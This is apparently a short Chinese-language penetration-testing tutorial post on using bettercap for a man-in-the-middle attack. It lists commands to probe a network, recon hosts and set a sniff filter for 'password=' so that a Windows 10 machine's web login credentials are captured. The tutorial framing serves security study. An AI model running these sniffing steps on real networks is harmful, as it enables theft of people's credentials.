Day20:今天我们来聊一下如何使用bettercap工具来拦截 HTTP 流量

攻击者可以使用session hijacking来发起各种攻击,例如中间人(MITM)攻击。

在MITM攻击中,攻击者将自己置於授权客户端和网络服务器之间,以便在任一方向

传输的所有信息都通过它们。作为渗透测试员必须了解MITM攻击的工作原理,

以便保护组织的敏感信息免受他们的侵害。

登入Parrot Security主机,输入sudo su切换身份

输入cd切换目録

输入指令bettercap -h查看指令用法

输入指令bettercap -iface eth0开始执行

输入help

输入指令net.probe on

输入指令net.recon on

输入指令set net.sniff.regexp ‘.*password=.+’

我们可以从bettercap去拦劫Windows 10主机的网路流量

从中截取到在Windows 10登入网站输入的帐号/密码(实做有问题先放示意图)